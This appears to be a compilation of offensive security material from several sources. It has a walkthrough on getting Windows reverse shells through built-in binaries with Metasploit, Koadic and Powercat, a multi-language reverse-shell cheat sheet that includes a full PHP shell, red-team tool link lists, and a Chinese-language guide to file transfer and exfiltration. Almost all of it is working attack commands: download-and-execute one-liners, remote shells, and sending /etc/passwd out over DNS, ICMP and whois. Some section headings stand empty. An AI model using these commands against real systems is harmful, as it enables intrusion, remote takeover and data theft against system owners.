one line reverse windows shell

from https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

Table of Content

Mshta.exe

  • Launch HTA attack via HTA Web Server of Metasploit

Rundll32.exe

  • Launch Rundll32 Attack via SMB Delivery of Metasploit

Regsvr32.exe

  • Launch Regsvr32 via Script Web Delivery of Metasploit

Certutil.exe

  • Launch MSbuild Attack via Msfvenom C# shellcode

Powershell.exe

  • Launch Powercat attack via Powershell
  • Launch cscript.exe via Powershell
  • Launch Batch File Attack via Powershell

Msiexec.exe

  • Launch msiexec attack via msfvenom

Wmic.exe

  • Launch Wmic.exe attack via Koadic

Mshta.exe

Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or VBScript with. You can interpret these files using the Microsoft MSHTA.exe tool.

Metasploit contain the “HTA Web Server” module which generates malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed.

1234use exploit/windows/misc/hta_servermsf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109msf exploit(windows/misc/hta_server) > exploit

Now run the malicious code through mshta.exe on the victim’s machine (vulnerable to RCE) to obtain meterpreter sessions.

Once you will execute the malicious hta file on the remote machine with the help of mshta.exe, you get the reverse connection at your local machine (Kali Linux).

1mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta

As you can observe, we have the meterpreter session of the victim as shown below:

Rundll32.exe

Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.

Launch Rundll32 Attack via SMB Delivery of Metasploit

Metasploit also contain the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.

123use exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109msf exploit(windows/smb/smb_delivery) > exploit

Now run the malicious code through rundll32.exe on the victim machine (vulnerable to RCE) to obtain meterpreter sessions.

Once you will execute the dll file on the remote machine with the help of rundll32.exe, you will get the reverse connection at your local machine (Kali Linux).

1rundll32.exe \\192.168.1.109\vabFG\test.dll,0

As you can observe, we have the meterpreter session of the victim as shown below:

Regsvr32.exe

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll to uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

Launch Regsvr32 via Script Web Delivery of Metasploit

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection.

Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request a .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

123456use exploit/multi/script/web_deliverymsf exploit (web_delivery)>set target 3msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcpmsf exploit (web_delivery)> set lhost 192.168.1.109msf exploit (web_delivery)>set srvhost 192.168.1.109msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Once you will execute the scrobj.dll file on the remote machine with the help of regsrv32.exe, you will get the reverse connection at your local machine (Kali Linux).

1regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

As you can observe, we have the meterpreter session of the victim as shown below:

Certutil.exe

Certutil.exe is a command-line program that is installed as part of Certificate Services. We can use this tool to execute our malicious exe file in the target machine to get a meterpreter session.

Launch certutil Attack via Msfvenom

Generate a malicious executable (.exe) file with msfvenom and start multi/handler to get the reverse shell of the victim’s machine.

1msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

Now, to dump configuration information or shell.exe file files with certutil. you can follow below syntax:

Syntax: [-f] [-urlcache] [-split] Path of executable file

1certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe
12345use exploit/multi/handlermsf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(multi/handler) > set lhost 192.168.1.109msf exploit(multi/handler) > set lport 1234msf exploit(multi/handler) > exploit

As you can observe, we have a meterpreter session of the victim as shown below:

Powershell.exe

You can use PowerShell.exe to start a PowerShell session from the command line of another tool, such as Cmd.exe, or use it at the PowerShell command line to start a new session. Read more from the official website of Microsoft Windows from here.

Launch Powercat attack via Powershell

Powercat is a PowerShell native backdoor listener and reverse shell also known as modifying version of netcat because it has integrated support for the generation of encoded payloads, which msfvenom would do and also has a client- to- client relay, a term for Powercat client that allows two separate listeners to be connected.

Download PowerShell in your local machine and then the powercat.ps1 transfer files with python HTTP server to obtain reverse shell of the target as shown below and start netcat listener.

12git clone https://github.com/besimorhino/powercat.gitpython -m SimpleHTTPServer 80

Then execute the following command on the remote side to get netcat session.

1powershell -c “IEX(New-Object System.Net.WebClient).DownloadString(‘//192.168.1.109/powercat.ps1’);powercat -c 192.168.1.109 -p 1234 -e cmd”

As you can observe, we have netcat session of the victim as shown below:

Batch File

Similarly, PowerShell allows the client to execute bat file, therefore let’s generate the malicious batch file with msfvenom as given below and start netcat listener.

1msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

Then execute the following command on the remote side to get netcat session.

1powershell -c “IEX((New-Object System.Net.WebClient).DownloadString(‘//192.168.1.109/1.bat’))

As you can observe, we have netcat session of the victim as shown below:

Cscript

Similarly, PowerShell allows the client to execute cscript.exe to run wsf, js and vbscript, therefore let’s generate malicious bat file with msfvenom as given below and start multi/handler as the listener.

1msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs

Then execute the following command on the remote side to get a meterpreter session.

1powershell.exe -c “(New-Object System.NET.WebClient).DownloadFile(‘//192.168.1.109/1.vbs’,\”$env:temp\test.vbs\”);Start-Process %windir%\system32\cscript.exe \”$env:temp\test.vbs\””
12345use exploit/multi/handlermsf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(multi/handler) > set lhost 192.168.1.109msf exploit(multi/handler) > set lport 1234msf exploit(multi/handler) > exploit

As you can observe, we have meterpreter session of the victim as shown below:

Msiexec.exe

As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.  

Launch msiexec attack via msfvenom

Let’s generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows and start multi/handler as the listener.

1msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

Once you will execute the 1.msi file on the remote machine with the help of msiexec, you will get the reverse connection at your local machine (Kali Linux).

1msiexec /q /i http://192.168.1.109/1.msi
12345use exploit/multi/handlermsf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(multi/handler) > set lhost 192.168.1.109msf exploit(multi/handler) > set lport 1234msf exploit(multi/handler) > exploit

As you can observe, we have meterpreter session of the victim as shown below:

Wmic.exe

The WMIC utility is a Microsoft tool provides a WMI command-line interface that is used for a variety of administrative functions for local and remote machine and also used to wmic query such as system settings, stop processes and execute scripts locally or remotely. Therefore, it can invoke XSL script (eXtensible Stylesheet Language).

Launch Wmic.exe attack via Koadic

Now will generate a malicious XSL file with the help of koadic which is a Command & Control tool which is quite similar to Metasploit and Powershell Empire.

To know how koadic works, read our article from here: //www.hackingarticles.in/koadic-com-command-control-framework/

Once installation gets completed, you can run ./koadic file to start koadic and start with loading the stager/js/wmic stager by running the following command and set SRVHOST where the stager should call home.

123use stager/js/wmicset SRVHOST 192.168.1.107run

Execute WMIC following command to download and run the malicious XSL file from a remote server:

1wmic os get /FORMAT:”//192.168.1.107:9996/g8gkv.xsl”

Once the malicious XSL file will get executed on the target machine, you will have a Zombie connection just like Metasploit.

Reverse shells

Awk

awk 'BEGIN {s = "/inet/tcp/0/LHOST/LPORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Bash

bash -i >& /dev/tcp/LHOST/LPORT 0>&1
0<&196;exec 196<>/dev/tcp/LHOST/LPORT; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/LHOST/LPORT && while read line 0<&5; do $line 2>&5 >&5; done

Java

r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/LHOST/LPORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor()

Javascript

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(LPORT, "LHOST", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();

Netcat

nc -e /bin/sh LHOST LPORT
/bin/sh | nc LHOST LPORT
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f
rm -f backpipe; mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc LHOST LPORT 1>/tmp/backpipe
rm -f backpipe; mknod /tmp/backpipe p && nc LHOST LPORT 0<backpipe | /bin/bash 1>backpipe

Perl

perl -e 'use Socket;$i="LHOST";$p=LPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"LPORT:LHOST");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"LPORT:LHOST");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PHP

php -r '$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("LHOST",LPORT);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("LHOST",LPORT);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("LHOST",LPORT);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("LHOST",LPORT);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
// pentestmonkey one-liner ^_^
<?php set_time_limit (0); $VERSION = "1.0"; $ip = "LHOST"; $port = LPORT; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise.  This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) {  if (!$daemon) { print "$string\\n"; } } ?>

Powershell

$client = New-Object System.Net.Sockets.TCPClient('LHOST',LPORT); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();

Python

# TCP
python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('LHOST',LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn(['/bin/bash','-i']);s.close();exit();"
# STCP
python -c "import os,pty,socket,sctp;s=sctp.sctpsocket_tcp(socket.AF_INET);s.connect(('LHOST',LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn(['/bin/bash','-i']);s.close();exit();"
# UDP
python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect(('LHOST',LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn(['/bin/bash','-i']);s.close();"

Ruby

ruby -rsocket -e 'f=TCPSocket.open("LHOST",LPORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("LHOST","LPORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# Windows
ruby -rsocket -e 'c=TCPSocket.new("LHOST","LPORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Socat

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:LHOST:LPORT

TCLsh

echo 'set s [socket LHOST LPORT];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet LHOST LPORT 0/tmp/p
telnet LHOST LPORT | /bin/bash | telnet LHOST LPORT

xterm

# Make sure the Xserver is listening to TCP.
xhost +RHOST
xterm -display LHOST:0 or DISPLAY=LHOST:0 xterm

Listeners

socat file:`tty`,echo=0,raw tcp-listen:LPORT
nc -lvvp LPORT

Search engines for Hackers

  • https://censys.io/
  • https://www.shodan.io/
  • https://viz.greynoise.io/table
  • https://www.zoomeye.org/
  • https://wigle.net/
  • https://publicwww.com/
  • https://hunter.io/
  • https://haveibeenpwned.com/
  • https://pipl.com/
  • https://osintframework.com/
  • http://dns.bufferover.run/dns?q=baidu.com

Redteam Toolkit

https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
https://github.com/infosecn1nja/Red-Teaming-Toolkit
https://github.com/redcanaryco/atomic-red-team
https://github.com/vysecurity/RedTips
https://github.com/threatexpress/red-team-scripts
https://github.com/KCarretto/Arsenal
https://github.com/marcosValle/awesome-windows-red-team
https://github.com/abhijithbr/Red-team-Learning-resources
https://github.com/rosonsec/RedTeam

Active Intelligence Gathering

Passive Intelligence Gathering

Frameworks

Weaponization

Delivery

Phishing

Watering Hole Attack

Command and Control

Remote Access Tools

Staging

Lateral Movement

Establish Foothold

Escalate Privileges

Domain Escalation

Local Escalation

Data Exfiltration

Misc

Wireless Networks

Embedded & Peripheral Devices Hacking

  • magspoof a portable device that can spoof/emulate any magnetic stripe, credit card or hotel card “wirelessly”, even on standard magstripe (non-NFC/RFID) readers. https://github.com/samyk/magspoof
  • WarBerryPi was built to be used as a hardware implant during red teaming scenarios where we want to obtain as much information as possible in a short period of time with being as stealth as possible. https://github.com/secgroundzero/warberry
  • P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). https://github.com/mame82/P4wnP1
  • malusb HID spoofing multi-OS payload for Teensy. https://github.com/ebursztein/malusb
  • Fenrir is a tool designed to be used “out-of-the-box” for penetration tests and offensive engagements. Its main feature and purpose is to bypass wired 802.1x protection and to give you an access to the target network. https://github.com/Orange-Cyberdefense/fenrir-ocd
  • poisontap exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js. https://github.com/samyk/poisontap
  • WHID WiFi HID Injector – An USB Rubberducky / BadUSB On Steroids. https://github.com/whid-injector/WHID

Software For Team Communication

  • RocketChat is free, unlimited and open source. Replace email & Slack with the ultimate team chat software solution. https://rocket.chat
  • Etherpad is an open source, web-based collaborative real-time editor, allowing authors to simultaneously edit a text document https://etherpad.net

Log Aggregation

C# Offensive Framework

Labs

Scripts

References

From: https://github.com/shr3ddersec/Shr3dKit

Freddy the Serial(isation) Killer – Deserialization Bug Finder

A Burp Suite extension to aid in detecting and exploiting serialisation libraries/APIs.

This useful extension was originally developed by Nick Bloor (@nickstadb) for NCC Group and is mainly based on the work of Alvaro Muñoz and Oleksandr Mirosh, Friday the 13th: JSON Attacks, which they presented at Black Hat USA 2017 and DEF CON 25. In their work they reviewed a range of JSON and XML serialisation libraries for Java and .NET and found that many of them support serialisation of arbitrary runtime objects and as a result are vulnerable in the same way as many serialisation technologies are – snippets of code (POP gadgets) that execute during or soon after deserialisation can be controlled using the properties of the serialized objects, often opening up the potential for arbitrary code or command execution.

Further modules supporting more formats including YAML and AMF are also included, based on the paper Java Unmarshaller Security – Turning your data into code execution and tool marshalsec by Moritz Bechler.

This Burp Suite extension implements both passive and active scanning to identify and exploit vulnerable libraries.

https://github.com/nccgroup/freddy

渗透测试中的文件传输技巧

文章来源:https://paper.seebug.org/834/

搭建 HTTP server

Python

python2:

python -m SimpleHTTPServer 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

python3:

python -m http.server 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

PHP 5.4+

当 PHP 版本大于 5.4 是,可使用 PHP 在当前目录启动 HTTP 服务,端口为 1337

php -S 0.0.0.0:1337

Ruby

下面的命令会在当前目录下启动 HTTP 服务,端口为 1337

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'

Ruby 1.9.2+

ruby -run -e httpd . -p 1337

Perl

perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

Thanks to: http://stackoverflow.com/questions/8058793/single-line-python-webserver

busybox httpd

busybox httpd -f -p 8000

Download files from HTTP server

以下列出了在 Windows 和 Linux 系统下使用系统自带工具从 HTTP Server 下载文件的几种方法

Windows

powershell

下载并执行:

powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'

certutil

下载并执行:

certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe

bitsadmin

下载并执行:

bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe

bitsadmin 的下载速度比较慢

regsvr32

regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll

Linux

Curl

curl http://1.2.3.4/backdoor

Wget

wget http://1.2.3.4/backdoor

awk

在使用 awk 进行下载文件时,首先使用以上列出的任意一条命令启动一个 HTTP Server

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'

Setup HTTP PUT server

以下列出了上传文件到 HTTP Server 的几种方法

使用 Nginx 搭建 HTTP PUT Server

mkdir -p /var/www/upload/ # 创建目录 
chown www-data:www-data /var/www/upload/ # 修改目录所属用户和组
cd /etc/nginx/sites-available # 进入 nginx 虚拟主机目录

# 写入配置到 file_upload 文件
cat <<EOF > file_upload
server {
    listen 8001 default_server;
    server_name kali;
        location / {
        root /var/www/upload;
        dav_methods PUT;
    }
}
EOF
# 写入完毕
cd ../sites-enable # 进入 nginx 虚拟主机启动目录
ln -s /etc/nginx/sites-available/file_upload file_upload # 启用 file_upload 虚拟主机
systemctl start nginx # 启动 Nginx

使用 Python 搭建 HTTP PUT Server

以下代码保存到 HTTPutServer.py 文件里:

# ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server
import sys
import signal
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler



class PUTHandler(BaseHTTPRequestHandler):
    def do_PUT(self):
        length = int(self.headers['Content-Length'])
        content = self.rfile.read(length)
        self.send_response(200)
        with open(self.path[1:], "w") as f:
            f.write(content)


def run_on(port):
    print("Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ...".format(sys.argv[1], port))
    server_address = (sys.argv[1], port)
    httpd = HTTPServer(server_address, PUTHandler)
    httpd.serve_forever()


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage:\n\tpython {0} ip 1337".format(sys.argv[0]))
        sys.exit(1)
    ports = [int(arg) for arg in sys.argv[2:]]
    try:
        for port_number in ports:
            server = Thread(target=run_on, args=[port_number])
            server.daemon = True # Do not make us wait for you to exit
        server.start()
        signal.pause() # Wait for interrupt signal, e.g. KeyboardInterrupt
    except KeyboardInterrupt:
        print "\nPython HTTP PUT Server Stoped."
        sys.exit(1)

运行方法:

$ python HTTPutServer.py 10.10.10.100 1337
Starting a HTTP PUT Server on 10.10.10.100 port 1337 (http://10.10.10.100:1337) ...

上传文件到 HTTP PUT server

Linux

Curl

$ curl --upload-file secret.txt http://ip:port/

Wget

$ wget --method=PUT --post-file=secret.txt http://ip:port/

Windows

Powershell

$body = Get-Content secret.txt
Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body

使用 Bash /dev/tcp 进行文件传输

首先需要监听端口

文件接收端:

nc -lvnp 1337 > secret.txt 

文件发送端:

cat secret.txt > /dev/tcp/ip/port

使用 SMB 协议进行文件传输

搭建简易 SMB Server

搭建简易SMB Server 需要用到 Impacket 项目的 smbserver.py 文件

Impacket 已默认安装在 Kali Linux 系统中

syntax: impacker-smbserver ShareName SharePath

$ mkdir smb # 创建 smb 目录
$ cd smb # 进入 smb目录
$ impacket-smbserver share `pwd` # 在当前目录启动 SMB server,共享名称为 share

从 SMB server 下载文件

copy \\IP\ShareName\file.exe file.exe

上传文件到 SMB server

net use x: \\IP\ShareName

copy file.txt x:

net use x: /delete

使用 whois 命令进行文件传输

接收端 Host B:

nc -vlnp 1337 | sed "s/ //g" | base64 -d 

发送端 Host A:

whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64` 

使用 ping 命令进行文件传输

发送端:

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

接收端:

以下代码保存到 ping_receiver.py

import sys

try:
    from scapy.all import *
except:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)


def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 8:
            data = pkt[ICMP].load[-4:]
            print(f'{data.decode("utf-8")}', flush=True, end="", sep="")

sniff(iface="eth0", prn=process_packet)

执行方法:

python3 ping_receiver.py

使用 dig 命令进行文件传输

/etc/passwdSenderReciver

发送端:

xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done

接收端:

以下代码使用了 python 的 scapy 模块,需要手动安装

代码保存到 dns_reciver.py 文件中

try:
    from scapy.all import *
except:
    print("Scapy not found, please install scapy: pip install scapy")

def process_packet(pkt):
    if pkt.haslayer(DNS):
        domain = pkt[DNS][DNSQR].qname.decode('utf-8')
        root_domain = domain.split('.')[1]
        if root_domain.startswith('gooogle'):
            print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')

sniff(iface="eth0", prn=process_packet)

运行方法:

python3 dns_reciver.py

使用 NetCat 进行文件传输

1.txtA:10.10.10.100B:10.10.10.200

接受端:

nc -l -p 1337 > 1.txt

发送端:

cat 1.txt | nc -l -p 1337

或者

nc 10.10.10.200 1337 < 1.txt

在极端环境下,如果接受端没有 nc 可以使用 Bash 的 /dev/tcp 接收文件:

cat < /dev/tcp/10.10.10.200/1337 > 1.txt

参考链接